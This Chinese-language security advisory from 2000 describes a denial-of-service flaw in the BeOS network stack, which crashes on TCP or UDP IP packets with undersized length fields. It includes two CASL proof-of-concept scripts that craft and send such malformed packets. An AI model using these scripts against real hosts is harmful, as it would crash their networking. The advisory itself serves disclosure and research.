首页 -> 安全研究

安全研究

安全漏洞
BeOS 网络堆栈拒绝服务攻击漏洞

发布日期:2000-04-09
更新日期:2000-04-09

受影响系统:
BeOS
描述:

  当接受一些特殊格式的IP包时,BeOS的网络堆栈就会崩溃。一种是协议设置为TCP的IP包,
  如果它的长度字段被设置成小于40字节,它就会使正在接受的的网络进程崩溃。同样,如
  果一个IP包的协议字段设置为UDP,但它的IP长度字段设置成小于28字节,这个包也会导致
  BeOS的网络堆栈崩溃。40字节是IP+TCP头的最小长度,28字节是IP+UDP头的最小长度。
  
  
<* 来源:     Tim Newsham (newsham@LAVA.NET)
              Mike Frantzen (ISIC)
   相关链接: http://bebugs.be.com/devbugs/      
             http://expert.cc.purdue.edu/~frantzen/
*>
                         


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

下面是两个简单的测试程序,使用CASL脚本语言。CASL是NAI公司的一种包处理脚本语言。
可以从 ftp://ftp.nai.com/pub/security/casl/ 免费下载。
   
  

Script 1:
    #!/usr/local/casl/bin/casl


    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"


    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;


    IPH = copy UDPIP;


    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 27;


    packet = [ IPH ];
    ip_output(packet);


Script 2:
    #!/usr/local/casl/bin/casl


    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"


    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;


    IPH = copy TCPIP;


    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 39;


    packet = [ IPH ];
    ip_output(packet);




建议:
BeOS已经知道了这个问题,不久将会重新替换整个网络系统实现部分。

浏览次数:6371
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障